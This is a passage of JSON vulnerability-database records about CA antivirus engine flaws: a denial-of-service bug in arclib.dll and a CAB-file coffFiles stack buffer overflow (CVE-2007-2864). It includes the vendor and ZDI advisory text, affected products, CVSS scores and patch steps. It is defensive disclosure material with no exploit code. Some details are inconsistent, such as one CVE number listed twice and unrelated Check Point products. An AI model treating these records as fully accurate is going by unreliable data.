"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89138\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8250/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14863/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3390/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8119/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89140"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86925\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/313/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86836"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14435/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo87114"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86923\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86834"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89141"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10672/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7112/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10673/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-27237"
},
{
"date": "2007-07-24T00:00:00",
"db": "BID",
"id": "25049"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"date": "2007-07-25T04:50:57",
"db": "PACKETSTORM",
"id": "58024"
},
{
"date": "2007-07-25T04:42:29",
"db": "PACKETSTORM",
"id": "58018"
},
{
"date": "2007-07-26T04:26:32",
"db": "PACKETSTORM",
"id": "58032"
},
{
"date": "2007-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"date": "2007-07-26T00:30:00",
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "VULHUB",
"id": "VHN-27237"
},
{
"date": "2007-07-27T18:05:00",
"db": "BID",
"id": "25049"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Anti-Virus Such as arclib.dll Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.6
}
}
VAR-200706-0018
Vulnerability from variot - Updated: 2025-04-10 23:01Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file. There are several affected products. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA has issued an update to address the vulnerabilities. The first vulnerability, CVE-2007-2863, is due to insufficient bounds checking on filenames contained in a CAB archive. The second vulnerability, CVE-2007-2863, is due to insufficient bounds checking on the "coffFiles" field. By using a specially malformed CAB file, an attacker can cause a crash or take unauthorized action on an affected system.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a High risk rating.
Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8, r8.1 CA Anti-Virus 2007 (v8) eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3) eTrust Internet Security Suite r1, r2 eTrust EZ Armor r1, r2, r3.x CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Protection Suites r2, r3 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus Gateway) 7.1 Unicenter Network and Systems Management (NSM) r3.0 Unicenter Network and Systems Management (NSM) r3.1 Unicenter Network and Systems Management (NSM) r11 Unicenter Network and Systems Management (NSM) r11.1 BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup r11 for Windows BrightStor Enterprise Backup r10.5 BrightStor ARCserve Backup v9.01 CA Common Services CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)
Affected Platforms: All
Status and Recommendation: CA has issued content update 30.6 to address the vulnerabilities. The updated engine is provided with content updates. Ensure the latest content update is installed if the signature version is less than version 30.6.
For BrightStor ARCserve Backup:
- To update the signatures one time only, open a command window, change into the "C:\Program Files\CA\SharedComponents\ScanEngine" directory, and enter the following command:
inodist /cfg inodist.ini
-
To update on a regular schedule:
-
Submit a GenericJob using the ARCserve Job Scheduler. Please search the BrightStor Administrator's Guide for 'Antivirus Maintenance' and follow the directions.
Or
- Use the above command line instruction with the AT Scheduler.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for this vulnerability: Security Notice for CA products implementing the Anti-Virus engine http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit ynotice.asp CA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer Overflow Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680 CAID: 35395, 35396 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396 Reported By: ZDI ZDI Advisory: ZDI-07-034, ZDI-07-035 http://www.zerodayinitiative.com/advisories/ZDI-07-034.html http://www.zerodayinitiative.com/advisories/ZDI-07-035.html CVE References: CVE-2007-2863, CVE-2007-2864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864 OSVDB References: OSVDB-35244, OSVDB-35245 http://osvdb.org/35244 http://osvdb.org/35245
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGaCc7eSWR3+KUGYURAnegAKCFM9tJ6RgdwIAc9JRfOcx807pEHwCdHofV s2hnGDiljhAMZquR9D1uya8= =PQi4 -----END PGP SIGNATURE----- . More details can be found at:
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp
-- Disclosure Timeline: 2007.02.16 - Vulnerability reported to vendor 2007.06.05 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by an anonymous researcher.
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster@3com.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0018",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "computer associates",
"version": null
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "etrust antivirus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.5"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r60a"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r61"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r62"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r65"
},
{
"model": "etrust antivirus",
"scope": null,
"trust": 0.7,
"vendor": "computer associates",
"version": null
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.1"
},
{
"model": "integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates integrated threat management r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.01"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:checkpoint:vpn-1_power_utm",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anonymous",
"sources": [
{
"db": "ZDI",
"id": "ZDI-07-035"
}
],
"trust": 0.7
},
"cve": "CVE-2007-2864",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-2864",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-26226",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-2864",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#105105",
"trust": 0.8,
"value": "15.19"
},
{
"author": "NVD",
"id": "CVE-2007-2864",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-098",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-26226",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file. There are several affected products. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA has issued an update to \naddress the vulnerabilities. The first vulnerability, \nCVE-2007-2863, is due to insufficient bounds checking on filenames \ncontained in a CAB archive. The second vulnerability, \nCVE-2007-2863, is due to insufficient bounds checking on the \n\"coffFiles\" field. By using a specially malformed CAB file, an \nattacker can cause a crash or take unauthorized action on an \naffected system. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a High risk rating. \n\nAffected Products:\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8, \n r8.1\nCA Anti-Virus 2007 (v8)\neTrust EZ Antivirus r7, r6.1\nCA Internet Security Suite 2007 (v3)\neTrust Internet Security Suite r1, r2\neTrust EZ Armor r1, r2, r3.x\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Protection Suites r2, r3\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus \n Gateway) 7.1\nUnicenter Network and Systems Management (NSM) r3.0\nUnicenter Network and Systems Management (NSM) r3.1\nUnicenter Network and Systems Management (NSM) r11\nUnicenter Network and Systems Management (NSM) r11.1\nBrightStor ARCserve Backup r11.5\nBrightStor ARCserve Backup r11.1\nBrightStor ARCserve Backup r11 for Windows\nBrightStor Enterprise Backup r10.5\nBrightStor ARCserve Backup v9.01\nCA Common Services\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\n\nAffected Platforms:\nAll\n\nStatus and Recommendation:\nCA has issued content update 30.6 to address the vulnerabilities. \nThe updated engine is provided with content updates. Ensure the \nlatest content update is installed if the signature version is \nless than version 30.6. \n\nFor BrightStor ARCserve Backup:\n\n1. To update the signatures one time only, open a command window, \nchange into the \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" \ndirectory, and enter the following command:\n\ninodist /cfg inodist.ini\n\n2. To update on a regular schedule:\n\n* Submit a GenericJob using the ARCserve Job Scheduler. Please \nsearch the BrightStor Administrator\u0027s Guide for \u0027Antivirus \nMaintenance\u0027 and follow the directions. \n\nOr\n\n* Use the above command line instruction with the AT Scheduler. \n\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for this vulnerability:\nSecurity Notice for CA products implementing the Anti-Virus engine\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit\nynotice.asp\nCA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer \nOverflow Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680\nCAID: 35395, 35396\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396\nReported By: ZDI\nZDI Advisory: ZDI-07-034, ZDI-07-035\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-034.html\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\nCVE References: CVE-2007-2863, CVE-2007-2864\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864\nOSVDB References: OSVDB-35244, OSVDB-35245\nhttp://osvdb.org/35244\nhttp://osvdb.org/35245\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact 